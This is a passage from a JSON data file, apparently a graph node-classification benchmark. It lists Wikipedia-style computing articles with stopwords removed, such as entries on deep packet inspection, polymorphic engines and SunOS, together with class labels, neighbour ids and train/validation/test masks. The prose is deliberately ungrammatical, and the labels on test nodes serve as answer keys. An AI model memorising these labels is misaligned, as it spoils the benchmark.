web application firewalls offer https inspection decrypt https traffic analyse waf either terminate encryption connection waf client browser uses plain http re-encrypt data using https certificate must distributed clients beforehand techniques used https ssl inspection also known https ssl interception used man-in-the-middle mitm attacks works like done tls-terminated connection https long firewall product modify truststore ssl-client traditionally mantra served isp well operate layer 4 osi model simply deciding packets go routing comparably easy handle securely traditional model still allows isp accomplish required tasks safely restricting bandwidth depending amount bandwidth used layer 4 rather per protocol application type layer 7 strong often ignored argument isp action layer 4 osi model provides known security community 'stepping stones platforms conduct man middle attacks problem exacerbated isp often choosing cheaper hardware poor security track records difficult arguably impossible secure task deep packet inspection openbsd packet filter specifically avoids dpi reason done securely confidence means dpi dependent security services talktalk former homesafe implementation actually trading security protectable often already protectable effective ways cost decreased security users also far less possibility mitigating risk homesafe service particular opt blocking dpi opted even business users ndpi fork opendpi eol developers ntop open source version non-obfuscated protocols pace another engine includes obfuscated encrypted protocols types associated skype encrypted bittorrent opendpi longer maintained opendpi-fork named ndpi created actively maintained extended new protocols including skype webex citrix many others l7-filter classifier linux netfilter identifies packets based application layer data classify packets kazaa http jabber citrix bittorrent ftp gnucleus edonkey2000 others classifies streaming mailing p2p voip protocols gaming applications hippie hi-performance protocol identification engine open source project developed linux kernel module developed josh ballard supports dpi well firewall functionality spid statistical protocol identification project based statistical analysis network flows identify application traffic spid algorithm detect application layer protocol layer 7 analysing flow packet sizes etc payload statistics byte values etc pcap files proof concept application currently supports approximately 15 application/protocols edonkey obfuscation traffic skype udp tcp bittorrent imap irc msn others tstat tcp statistic analysis tool provides insight traffic patterns gives details statistics numerous applications protocols libprotoident introduces lightweight packet inspection lpi examines first four bytes payload direction allows minimize privacy concerns decreasing disk space needed store packet traces necessary classification libprotoident supports 200 different protocols classification based combined approach using payload pattern matching payload size port numbers ip matching french company called amesys designed sold intrusive massive internet monitoring system eagle muammar gaddafi comprehensive comparison various network traffic classifiers depend deep packet inspection pace opendpi 4 different configurations l7-filter ndpi libprotoident cisco nbar shown independent comparison popular dpi tools traffic classification greater emphasis placed deep packet inspection comes light rejection sopa pipa bills many current dpi methods slow costly especially high bandwidth applications efficient methods dpi developed specialized routers able perform dpi routers armed dictionary programs help identify purposes behind lan internet traffic routing cisco systems second iteration dpi enabled routers announcement cisco isr g2 router",
    "neighbors": [
      517,
      10245,
      521,
      9744,
      9233,
      8211,
      4119,
      10283,
      3629,
      1070,
      7214,
      7739,
      10303,
      4163,
      8265,
      2136,
      1115,
      9318,
      1650,
      2162,
      5749,
      6773,
      3703,
      4732,
      5245,
      127,
      4224,
      10889,
      1169,
      3732,
      10392,
      1692,
      3742,
      4268,
      10416,
      6834,
      7859,
      2228,
      7364,
      11468,
      7887,
      3792,
      7376,
      7893,
      6364,
      9440,
      4843,
      3322,
      5371,
      3323,
      5373,
      9470,
      4863,
      1792,
      1317,
      8998,
      823,
      5959,
      331,
      11606,
      9048,
      6490,
      5469,
      5472,
      8039,
      2409,
      6000,
      7541,
      1400,
      3452,
      1942,
      11162,
      9117,
      939,
      11695,
      9142,
      8640,
      1474,
      9676,
      5084,
      8156,
      9181,
      10210,
      11248,
      1015,
      8696,
      2041,
      9722
    ],
    "mask": "None"
  },
  {
    "node_id": 10418,
    "label": 1,
    "text": "Database_virtualization:database virtualization database virtualization decoupling database layer lies storage application layers within application stack virtualization database layer enables shift away physical toward logical virtual virtualization enables compute storage resources pooled allocated demand enables sharing single server resources multi-tenancy well pooling server resources single logical database cluster cases database virtualization provides increased flexibility granular efficient allocation pooled resources scalable computing act partitioning data stores database grows use several decades two primary ways data partitioned inside legacy data management systems virtual partitioning logical data abstracted physical data autonomously creating managing large numbers data partitions 100s 1000s autonomously maintained resources required manage partitions minimal kind massive partitioning results “ shared-data ” “ shared-nothing ” architectures allow scalability multiple data partitions cross-partition querying transaction processing without full partition scanning partitioning database sources consumers fundamental concept greater numbers database sources inserting horizontal data virtualization layer sources consumers helps address complexity rick van der lans author multiple books sql relational databases defined data virtualization process offering data consumers data access interface hides technical aspects stored data location storage structure api access language storage technology",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      5658,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 10419,
    "label": 9,
    "text": "Espruino:espruino espruino open-source javascript interpreter microcontrollers designed devices small amounts ram low 8kb espruino created gordon williams 2012 attempt make microcontroller development truly multiplatform though initially open-source espruino firmware offered free download stm32 microcontrollers made open-source 2013 successful kickstarter campaign development board running software since original espruino board number new official development boards including small usb thumb-drive-sized espruino pico wifi-equipped espruino wifi puck.js built-in bluetooth pixl.js built-in lc display arduino shield compatibility addition official boards espruino runs approximately 40 types development boards including esp8266 large body reference material espruino including 100 tutorials well book making things smart contains selection hardware projects created espruino-based microcontrollers first official development board original espruino later boards available variety form factors original espruino followed espruino pico espruino wifi puck.js pixl.js breakout board featuring mdbt42q bluetooth le module used puck.js pixl.js also available espruino programs written using javascript espruino ide available web-based app google chrome app native windows application also alternative methods programming espruino boards using terminal programs example windows users program boards putty espruino open source different parts licensed follows",
    "neighbors": [
      8720,
      7235,
      3462,
      438
    ],
    "mask": "None"
  },
  {
    "node_id": 10420,
    "label": 4,
    "text": "Polymorphic_engine:polymorphic engine polymorphic engine sometimes called mutation engine mutating engine computer program used transform program subsequent version consists different code yet operates functionality example 3+1 6-2 achieve result yet use completely different code polymorphic engines typically work either encrypting code obfuscating code latter may involve encryption polymorphic engines used almost exclusively computer viruses shellcodes malware main purpose make hard virus scanners security software detect identify body malware traditional fixed signatures usually used first polymorphic engine called mte short mutation engine written 1992 virus author called 'dark avenger polymorphic packer type polymorphic engine polymorphic packer software tool rolls several kinds malware single package e-mail attachment ability make signature mutate time difficult detect remove",
    "neighbors": [
      2213,
      7717,
      7851,
      8171,
      3629,
      7515,
      7739
    ],
    "mask": "None"
  },
  {
    "node_id": 10421,
    "label": 2,
    "text": "Prevayler:prevayler prevayler open-source bsd system-prevalence layer java transparently persists plain old java objects in-ram database backed snapshots system via object serialization loaded system crash restore state changes data happen via transaction operations objects made serializable classes prevayler development started klaus wuestefeld read operations three four orders magnitude faster prevayler compared traditional database systems since objects always ram in-process prevayler requires enough ram keep entire system state",
    "neighbors": [
      5677
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10422,
    "label": 2,
    "text": "Network_block_device:network block device operating systems network block device device node whose content provided remote machine typically network block devices used access storage device physically reside local machine remote one example local machine access hard disk drive attached another computer technically network block device realized three components server part client part network client machine device node kernel driver controls device whenever program tries access device kernel driver forwards request client part fully implemented kernel done help userspace program server machine data resides physically server machine requests client handled userspace program network block device servers typically implemented userspace program running general-purpose computer function specific network block device servers reside userspace process process communicates client via conventional sockets accesses storage via conventional file system interface network block device client module available unix-like operating systems including linux bitrig since server userspace program potentially run every unix-like platform example nbd server part ported solaris",
    "neighbors": [
      10016,
      9762,
      7863,
      2314,
      10926,
      7983,
      6864,
      9972,
      2421,
      5397,
      823,
      1080,
      11221,
      8602,
      1406
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10423,
    "label": 9,
    "text": "Frederica_Darema:frederica darema frederica darema greek american physicist proposed spmd programming model 1984 dynamic data driven application systems dddas 2000 elected ieee fellow 2004 darema received bs degree school physics mathematics university athens greece ms ph d. degrees theoretical nuclear physics illinois institute technology university california davis respectively attended fulbright scholar distinguished scholar physics research associate positions university pittsburgh brookhaven national laboratory received aps industrial fellowship became technical staff member nuclear sciences department schlumberger doll research subsequently 1982 joined ibm thomas j. watson research center research staff member computer sciences department later-on established became manager research group ibm research parallel applications dr. darema national science foundation since 1994 managed new generation software dynamic data driven application systems programs 1996-1998 completed two-year assignment darpa air force office scientific research",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10424,
    "label": 3,
    "text": "Chuck_Yeager's_Advanced_Flight_Trainer:chuck yeager advanced flight trainer chuck yeager advanced flight trainer 1987 computer aircraft simulation game produced electronic arts originally released chuck yeager advanced flight simulator due legal dispute microsoft usage flight simulator name title pulled shelves later re-released chuck yeager advanced flight trainer many copies original title sold pulled shelves chuck yeager served technical consultant game likeness voice prominently used game allows player test pilot 14 different airplanes including bell x-1 yeager piloted become first man exceed mach 1 game embellished yeager laconic commentary user crashes one plane yeager remarks really screwed pooch one asides chuck yeager advanced flight trainer includes 11 real aircraft three experimental aircraft designed developers fictional experimental aircraft named people worked game game big hit ea selling 100,000 copies december 1987 sales surpassed 250,000 copies november 1989 game reviewers hartley patricia lesser complimented game role computers column dragon 126 1987 stating much game going quite time another flight simulator offer much performance buck reviewers gave pc/ms-dos version game 4 5 stars lessers reviewed macintosh version game 1988 dragon 140 role computers column giving version 4 stars well compute criticized blocky graphics sound noted simple graphics resulted high frame rate concluded chuck yeager differed games simulating flying high-performance experimental aircraft 1994 survey wargames computer gaming world gave title one-plus stars five stating replaced chuck yeager air combat game followed 1989 chuck yeager advanced flight trainer 2.0 1991 chuck yeager air combat",
    "neighbors": [
      4741,
      9006,
      9166,
      4910,
      2159
    ],
    "mask": "Train"
  },
  {
    "node_id": 10425,
    "label": 2,
    "text": "Trustix:trustix trustix secure linux linux distribution intended use servers focused security stability hardened secure os meaning non-essential services binaries installed unix staples like sendmail replaced programs like postfix trustix originally produced trustix company established late 1997 entrepreneurs usa norway company went bankrupt 2003 comodo group bought assets november 2003 shortly thereafter comodo announced end free version trustix secure linux long thereafter comodo changed minds free version reappeared late 2005 series budget cuts resulted many developers laid early 2006 members original trustix team left company trustix secure linux continues maintained small team developers india late 2007 comodo announced discontinue distribution updates direct support trustix secure linux effective december 31 2007",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      8615,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5492,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 10426,
    "label": 4,
    "text": "Parkerian_Hexad:parkerian hexad parkerian hexad set six elements information security proposed donn b. parker 1998 parkerian hexad adds three additional attributes three classic security attributes cia triad confidentiality integrity availability parkerian hexad attributes following attributes information atomic broken constituents non-overlapping refer unique aspects information information security breach described affecting one fundamental attributes information confidentiality refers limits get kind information example executives concerned protecting enterprise strategic plans competitors individuals concerned unauthorized access financial records integrity refers correct consistent intended state information unauthorized modification data whether deliberate accidental breach data integrity example data stored disk expected stable – supposed changed random problems disk controller similarly application programs supposed record information correctly introduce deviations intended values donn parker definition information integrity comes dictionaries integrity means information whole sound unimpared necessarily correct means nothing missing information complete intended good order author statement comes close saying information correct ... state information may incorrect authentic integrity correct authentic lacking integrity availability means timely access information example disk crash denial-of-service attacks cause breach availability delay exceeds expected service levels system described breach availability authenticity refers veracity claim origin authorship information example one method verifying authorship hand written document compare handwriting characteristics document sampling others already verified electronic information digital signature could used verify authorship digital document using public-key cryptography could also used verify integrity document possession control suppose thief steal sealed envelope containing bank debit card personal identification number even thief open envelope reasonable victim concerned thief could time situation illustrates loss control possession information involve breach confidentiality utility means usefulness example suppose someone encrypted data disk prevent unauthorized access undetected modifications – lost decryption key would breach utility data would confidential controlled integral authentic available – would n't useful form similarly conversion salary data one currency inappropriate currency would breach utility would storage data format inappropriate specific computer architecture e.g. ebcdic instead ascii 9-track magnetic tape instead dvd-rom tabular representation data substituted graph could described breach utility substitution made difficult interpret data utility often confused availability breaches described examples may also require time work around change data format presentation however concept usefulness distinct availability",
    "neighbors": [
      8674,
      3443,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 10427,
    "label": 7,
    "text": "PagerDuty:pagerduty pagerduty cloud computing company produces saas incident response platform departments 2018 company raised 170 million venture funding recognized forbes cloud 100 well usa today list top small mid-sized companies diversity 2018 pagerduty headquartered san francisco operations toronto ontario atlanta united kingdom australia platform designed alert clients disruptions outages machine learning automation software operates standalone service integrated existing systems company works 10,000 clients including airbnb ibm instacart lululemon uber william hill australia company founded 2009 toronto ontario university waterloo graduates alex solomon andrew miklas baskar puvanathasan company incubated combinator pagerduty raised seed funding round 1.9 million 2010 followed series round raised 10.7 million january 2013 july 2016 former ceo keynote systems jennifer tejada named ceo pagerduty later year company held first pagerduty summit industry conference encourage digital innovation pagerduty summit held san francisco 2017 2018 2016 pagerduty received silver stevie award female executive year computer services computer software category following year company gold new product service year award software service management solution silver award customer service department year computer services pagerduty announced funding round april 2017 led accel 43.8 million round included existing investors andreessen horowitz bessemer venture partners baseline ventures harrison metal september 2018 pagerduty raised 90 million round led t. rowe price associates wellington management june 2018 pagerduty launched event intelligence product designed analyze incoming digital signals human responses communicate incident response suggestions operators new incidents occur industry conference september 2018 company also launched pagerduty visibility pagerduty analytics march 2019 pagerduty filed s-1 sec anticipation ipo april 2019 pagerduty went public new york stock exchange",
    "neighbors": [
      9754,
      4194,
      467,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10428,
    "label": 2,
    "text": "Windows_Terminal:windows terminal windows terminal terminal emulator windows 10 written microsoft includes support command prompt powershell wsl ssh initial source code release github preview release first published microsoft store june 21 2019",
    "neighbors": [
      2568,
      5643,
      4624,
      6674,
      537,
      8729,
      540,
      3102,
      9762,
      8227,
      8740,
      10281,
      9780,
      2101,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      3170,
      622,
      1647,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8834,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      5300,
      7356,
      2749,
      200,
      9420,
      1741,
      1750,
      9946,
      2782,
      11487,
      2786,
      9442,
      4836,
      4326,
      2279,
      3308,
      5356,
      10993,
      4850,
      7411,
      3834,
      6396,
      1791,
      8959,
      11519,
      5380,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      808,
      3881,
      10024,
      10026,
      10029,
      7983,
      10033,
      1844,
      9525,
      11572,
      10039,
      6972,
      5437,
      7486,
      3394,
      8517,
      3922,
      4439,
      5465,
      2402,
      4458,
      6506,
      9593,
      2943,
      3970,
      10631,
      1418,
      5003,
      5004,
      1935,
      11677,
      929,
      4001,
      11683,
      430,
      6062,
      7088,
      9655,
      6584,
      1978,
      11196,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      11221,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      2545,
      6641,
      11249,
      8692,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 10429,
    "label": 3,
    "text": "Geoplexing:geoplexing geoplexing computer science term relating duplication computer storage applications within server farm geographically diverse locations purpose fault tolerance name comes contraction geographical multiplex geoplex server clusters duplicated one geographically separate sites geoplexes active-active clusters used tandem active-passive one clusters kept hot spare data applications shared either via cloning partitioning cloning server cluster handles one applications applications data cloned servers geoplex load balancer distributes requests cloned servers partitioning hardware applications duplicated geoplex application data divided servers requests routed correct server",
    "neighbors": [
      1801,
      2994,
      9677,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10430,
    "label": 9,
    "text": "Steelman_language_requirements:steelman language requirements steelman language requirements set requirements high-level general-purpose programming language meet created united states department defense department defense common high order language program 1978 predecessors document called order strawman woodenman tinman ironman requirements focused needs embedded computer applications emphasised reliability maintainability efficiency notably included exception handling facilities run-time checking parallel computing concluded existing language met criteria sufficient extent contest called create language would closer fulfilling design contest became ada programming language resulting language followed steelman requirements closely though exactly ada 95 revision language went beyond steelman requirements targeting general-purpose systems addition embedded ones adding features supporting object-oriented programming",
    "neighbors": [
      8262,
      10089,
      1611,
      428,
      8524
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10431,
    "label": 5,
    "text": "Messenger_Plus!:messenger plus messenger plus formerly known messenger plus live commonly abbreviated msgplus plus incorrectly msn plus add-on windows live messenger skype software provides additional functionality microsoft instant messaging client windows live messenger adding controls main interface controls affect messenger behaviour appearance often additional dialog boxes add-on first released may 2001 name messenger plus extension msn messenger windows messenger later changed name messenger plus release new windows live messenger client messenger plus live chosen 2011 name changed back messenger plus become one widely used add-ons microsoft im clients citing 62 million users february 2010 volunteers messenger plus community around world develop skins scripts submission database website software messenger plus generally expands features windows live messenger 2009 9.0 2011. notable features include messenger plus available 22 languages messenger plus originally created 2001 cyril paciullo better known pseudonym patchou born france currently resides canada started developing plus hobby next day job developer soon maintaining messenger plus software became full-time job q4 2009 paciullo announced longer full control product messenger plus owned yuna software limited q1 2011 paciullo officially declared left company chapter professional life closed financial details names people behind new company disclosed yuna software offices several places world office montreal also known kimahri software development team continued develop messenger plus developing messenger plus became full-time job form revenue added keep software free formerly software came bundled optional adware software developed circle development ltd. august 17 2005 messenger plus website contained petition microsoft anti-spyware division regarding windows defender known microsoft antispyware time detection messenger plus executable spyware subsequent warning messenger plus would attempt install spyware runtime post-installation rather setup program contained installer threat detected petition 401,683 signatures 10,137 pages long total sent redmond september 20 2005 stating messenger plus labeled threat september 23 2005 3 days petition mailed redmond canada microsoft released new definitions windows defender fixed false threat detection affecting messenger plus executable together detection improvements recent versions windows defender also stopped detecting messenger plus installer potentially dangerous software review websites criticized user agreement stating 'sponsorship agreement authorized installation optional adware software misleading looked like standard eula available english user get option install 'sponsor program however even slightly unorthodoxly since messenger plus 3.60 released september 27 2005 setup includes separate sponsor license agreement addition traditional eula agreements also translated several languages separate adware uninstallation program provided circle development ltd. appears users attempt uninstall sponsor program messenger plus early 2010 messenger plus versions 4.84 later longer contain sponsor program circle development ltd. yuna software currently uses conventional methods messenger plus bundles optional toolbar custom search page custom home page branded messenger plus network yuna software also launched sites 2010 affiliated messenger plus including plus games plus sports plus image plus network links old website earlier messenger plus versions caused sites mcafee siteadvisor warn website www.msgpluslive.net linked adware adware-lop/swizzor however siteadvisor tested current website www.msgplus.net found downloads free adware spyware potentially unwanted programs sites already found site safe example norton safe web found issues site stating 0 computer threats 0 identity threats 0 annoyance factors february 2013 yuna software released new installer messenger plus required user install least one bundled options order install software note may longer requirement recent updates appear require bundled options installed confirmed clean install coincide newly branded windows live messenger 2006 new versions messenger plus called messenger plus live rebuilt ground included new user interface design intended blend user interface windows live messenger since 2011 versions 5.0 later called messenger plus messenger plus 5 completely compatible windows live messenger 2011 latest version messenger plus longer supports messenger version older 2009 older messenger plus versions longer officially supported however last version messenger plus version 3.63 renamed messenger plus live still available download official website version supports msn messenger windows messenger 4.7 5 6 7 additionally last version messenger plus live version 4.90.392 name changed back also still available official website version supports windows live messenger 8.0 14.0 2009 messenger plus skype released english january 12 2012 adware adds video audio recording capabilities skype conversations lets users send flash animations users subsequent version messenger plus skype 1.2 released march 28 2012 introduced 16 additional languages video voice transformation effects ring tones version 1.5 released june 18 2012 included ability stream movies overlay images video conversations viewable skype-enabled devices including mobile phones tablets version 1.8 followed march 3 2013 release developed microsoft announcement discontinuing windows live messenger service integrated custom sounds united messenger plus windows live messenger/skype sound archive also introduced new default design add-on messenger plus skype application skype adds video audio recording capabilities skype notable features include skype announced intention discontinue desktop api used messenger plus skype note date happen originally december 2013 unknown skype tries come new methods support small subset desktop api functionality currently information available yuna website mentions plans handle desktop api discontinued skype point future version 3.0.0.180 messenger plus skype available automatic download around january 15 2014 built january 8th 2014 updated components december 2013 first version year feature seem mentioned anywhere sends ad messenger plus chat message random contacts feature makes less extension unusable second version year 3.0.0.185 released february 2014 feature mentioned turned apparently messenger plus still supported noted despite fact yuna software website gives impression software longer active development due following factors noted forums longer accessible public may even exist links redirect back yuna website archive forums exist hosted third party",
    "neighbors": [
      704,
      877,
      6797,
      7983,
      10392,
      603,
      3163
    ],
    "mask": "None"
  },
  {
    "node_id": 10432,
    "label": 2,
    "text": "Monaco_(typeface):monaco typeface monaco monospaced sans-serif typeface designed susan kare kris holmes ships os x already present previous versions mac operating system characters distinct difficult confuse 0 figure zero uppercase 1 figure one vertical bar uppercase l lowercase l unique feature font high curvature parentheses well width square brackets result empty pair parentheses square brackets strongly resemble circle square respectively monaco released least three forms original bitmap monospace font still appears roms even new world macs still available recent macos releases size 9 disabled antialiasing second outline form loosely similar lucida mono created truetype font system 6 7 standard font used sizes briefly third known mpw since designed used macintosh programmer workshop ide essentially straight conversion bitmap font outline font addition disambiguation features added truetype monaco original monaco 9 point bitmap font designed compact macintosh window displayed full screen terminal emulator program would result standard text user interface display 80 columns 25 lines august 2009 release mac os x 10.6 snow leopard menlo introduced default monospaced font instead monaco terminal xcode however monaco remains part os x. monaco default font current python idle used mac running os x el capitan",
    "neighbors": [
      2978,
      7171,
      166,
      1191,
      4141,
      10478,
      213,
      9912,
      6234,
      1435,
      3324,
      8701
    ],
    "mask": "Test"
  },
  {
    "node_id": 10433,
    "label": 4,
    "text": "IPFire:ipfire ipfire hardened open source linux distribution primarily performs router firewall standalone firewall system web-based management console configuration ipfire originally started fork ipcop rewritten basis linux scratch since version 2 supports installation add-ons add server services extended soho server april 2015 project became member open invention network basic requirements least 1ghz cpu 1gb ram 4gb hard drive two network cards needed connect ethernet network dsl lte wi-fi wlan supported according hardware required computing power run ipfire depends area application commonly x86 systems used arm devices raspberry pi banana pi supported ipfire used virtual environments kvm vmware xen qemu etc. basic setup ipfire happens guided dialogue console administration takes place web-based management interface add-ons additional features project regularly updated development team maintain security developed stateful packet inspection spi firewall ipfire separates network different segments based security risk organised colours normal clients connected lan represented green internet represented red optional dmz represented orange optional wireless network represented blue traffic flow segments unless specifically permitted firewall rule ipfire package management system called pakfire allows install system updates keep security date additional software packages customisation different usage scenarios needs linux system customised concrete purpose firewall design modular making functionalities extensible plugins base comes following features",
    "neighbors": [
      2049,
      2563,
      4611,
      550,
      10790,
      8753,
      569,
      5178,
      9279,
      10303,
      2118,
      8816,
      4725,
      5749,
      10872,
      5245,
      11396,
      6797,
      1172,
      3742,
      3243,
      1708,
      686,
      2228,
      9927,
      5322,
      4814,
      7887,
      9423,
      10451,
      1754,
      6364,
      5860,
      10987,
      5356,
      9964,
      8943,
      5363,
      9971,
      8439,
      1273,
      9983,
      1792,
      2825,
      1814,
      9496,
      6431,
      2339,
      5924,
      10531,
      8998,
      3885,
      7983,
      823,
      1849,
      11577,
      11073,
      1858,
      5959,
      10574,
      11086,
      9048,
      4953,
      5978,
      2907,
      3942,
      4480,
      3482,
      1436,
      3486,
      4511,
      7082,
      2996,
      11188,
      3007,
      5057,
      5067,
      7121,
      10708,
      4568,
      5608,
      10732
    ],
    "mask": "Test"
  },
  {
    "node_id": 10434,
    "label": 4,
    "text": "Chung_Kwei_(algorithm):chung kwei algorithm chung kwei spam filtering algorithm based teiresias algorithm finding coding genes within bulk dna",
    "neighbors": [
      8224,
      4294
    ],
    "mask": "Train"
  },
  {
    "node_id": 10435,
    "label": 9,
    "text": "Syntactic_sugar:syntactic sugar computer science syntactic sugar syntax within programming language designed make things easier read express makes language sweeter human use things expressed clearly concisely alternative style may prefer example many programming languages provide special syntax referencing updating array elements abstractly array reference procedure two arguments array subscript vector could expressed codice_1 instead many languages provide syntax codice_2 similarly array element update procedure three arguments example codice_3 many languages provide syntax codice_4 construct language called syntactic sugar removed language without effect language functionality expressive power remain language processors including compilers static analyzers often expand sugared constructs fundamental constructs processing process sometimes called desugaring term syntactic sugar coined peter j. landin 1964 describe surface syntax simple algol-like programming language defined semantically terms applicative expressions lambda calculus centered lexically replacing λ later programming languages clu ml scheme extended term refer syntax within language could defined terms language core essential constructs convenient higher-level features could desugared decomposed subset fact usual mathematical practice building primitives building landin distinction essential language constructs syntactic sugar 1991 matthias felleisen proposed codification expressive power align widely held beliefs literature defined expressive mean without language constructs question program would completely reorganized programmers feel syntax usability features either unimportant outright frivolous notably special syntactic forms make language less uniform specification complex may cause problems programs become large complex view particularly widespread lisp community lisp simple regular syntax surface syntax easily modified example alan perlis quipped epigrams programming reference bracket-delimited languages syntactic sugar causes cancer semi-colons metaphor extended coining term syntactic salt indicates feature designed make harder write bad code specifically syntactic salt hoop programmers must jump prove know going rather express program action example java pascal assigning float value variable declared int without additional syntax explicitly stating intention result compile error c c++ automatically truncate floats assigned int however syntax semantics c hiding inherited class member compiler warning issued unless codice_29 keyword used specify hiding intentional avoid potential bugs owing similarity switch statement syntax c c++ c requires codice_30 non-empty codice_31 label codice_32 unless codice_33 codice_34 codice_35 used even though allow implicit fall-through using codice_33 specifying subsequent label produces c/c++-like fall-through syntactic salt may defeat purpose making code unreadable thus worsen quality – extreme cases essential part code may shorter overhead introduced satisfy language requirements alternative syntactic salt generating compiler warnings high probability code result mistake – practice common modern c/c++ compilers extensions syntactic saccharin syntactic syrup meaning gratuitous syntax make programming easier",
    "neighbors": [
      512,
      515,
      4486,
      8582,
      1931,
      9871,
      6160,
      1947,
      155,
      1565,
      6047,
      1952,
      5537,
      3876,
      4777,
      5165,
      5677,
      10413,
      1333,
      2617,
      10555,
      10684,
      8385,
      8262,
      5833,
      1611,
      8524,
      5837,
      11212,
      335,
      11475,
      1883,
      10083,
      7805,
      6502,
      8554,
      3051,
      9078,
      5880,
      7292,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 10436,
    "label": 2,
    "text": "SunOS:sunos sunos unix-branded operating system developed sun microsystems workstation server computer systems sunos name usually used refer versions 1.0 4.1.4 based bsd versions 5.0 later based unix system v release 4 marketed brand name solaris sunos 1 supported sun-2 series systems including sun-1 systems upgraded sun-2 68010 cpu boards sunos 2 supported sun-2 sun-3 68020 series systems sunos 4 supported sun-2 release 4.0.3 sun-3 4.1.1 sun386i 4.0 4.0.1 4.0.2 sun-4 sparc architectures although sunos 4 intended first release fully support sun new sparc processor also sunos 3.2 release preliminary support sun-4 systems sunos 4.1.2 introduced support sun first sun4m-architecture multiprocessor machines sparcserver 600mp series since single lock kernel one cpu time could execute kernel last release sunos 4 4.1.4 solaris 1.1.2 1994 sun4 sun4c sun4m architectures supported 4.1.4 sun4d supported sun continued ship sunos 4.1.3 4.1.4 december 27 1998 supported september 30 2003 1987 corporation sun announced collaborating project merge popular unix flavors market time bsd including many features unique sunos system v xenix would become system v release 4 svr4 september 4 1991 sun announced next major os release would switch bsd-derived source base one based svr4 although internal designation release would sunos 5 point sun began using marketing name solaris justification new overbrand encompassed sunos also openwindows desktop environment open network computing onc functionality even though new svr4-based os expected ship volume following year sun immediately began using new solaris name refer currently shipping sunos 4 release also including openwindows thus sunos 4.1.1 rebranded solaris 1.0 sunos 5.0 would considered part solaris 2.0 sunos 4.1 x micro versions continued released 1994 also given solaris 1 x equivalent name practice often still referred customers even sun personnel sunos release names matching version numbers straightforward today sunos 5 universally known solaris although sunos name still visible within os startup banner output uname command man page footers among places matching sunos 5.x release corresponding solaris marketing name simple solaris release name includes corresponding sunos 5 minor version number example solaris 2.4 incorporated sunos 5.4 one small twist solaris 2.6 2 dropped solaris name sunos minor number appears latest solaris release named solaris 11 incorporates sunos 5.11 gui environments bundled earlier versions sunos included suntools later sunview news 1989 sun released openwindows open look-compliant x11-based environment also supported sunview news applications became default sunos gui sunos 4.1.1",
    "neighbors": [
      2560,
      7682,
      9731,
      10761,
      2061,
      8207,
      9231,
      9743,
      6675,
      8725,
      10774,
      1561,
      2073,
      11292,
      9245,
      10789,
      5677,
      1071,
      1080,
      7224,
      9784,
      9791,
      10817,
      3651,
      7748,
      11332,
      2120,
      6218,
      1611,
      2132,
      597,
      10327,
      9306,
      607,
      1634,
      11363,
      7269,
      6760,
      9320,
      7792,
      5233,
      8306,
      9333,
      7286,
      631,
      633,
      8316,
      9343,
      640,
      2179,
      132,
      6787,
      4745,
      4235,
      9363,
      2710,
      3742,
      671,
      11426,
      7848,
      3241,
      1707,
      684,
      3247,
      3248,
      11440,
      6322,
      1718,
      11447,
      6338,
      9927,
      4298,
      8395,
      9422,
      8399,
      3285,
      8410,
      9438,
      6369,
      2786,
      7907,
      9441,
      9444,
      9955,
      10982,
      9452,
      4333,
      11501,
      2287,
      5872,
      5363,
      8435,
      1786,
      2301,
      3328,
      5381,
      11013,
      1801,
      6412,
      1807,
      1809,
      787,
      11539,
      1813,
      5397,
      8469,
      1304,
      8991,
      11553,
      8994,
      1316,
      7460,
      4908,
      6445,
      1839,
      7983,
      823,
      2871,
      7483,
      9027,
      8007,
      8524,
      2895,
      4433,
      850,
      8020,
      4438,
      11608,
      7515,
      5468,
      2397,
      5471,
      4960,
      10595,
      873,
      11626,
      878,
      7022,
      11123,
      5492,
      1399,
      2424,
      11129,
      5498,
      4989,
      7552,
      5506,
      7558,
      1927,
      11145,
      1422,
      7566,
      7573,
      7067,
      414,
      3487,
      3488,
      5534,
      6049,
      7072,
      5036,
      10156,
      11184,
      1971,
      2995,
      9141,
      953,
      9151,
      7104,
      9153,
      9665,
      1480,
      470,
      10200,
      10202,
      3551,
      6624,
      1508,
      4076,
      7148,
      2035,
      8179
    ],
    "mask": "None"
  },
  {
    "node_id": 10437,
    "label": 4,
